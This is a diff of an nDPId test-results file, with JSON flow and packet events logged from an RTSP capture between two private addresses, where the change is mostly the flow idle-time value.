-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} +00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 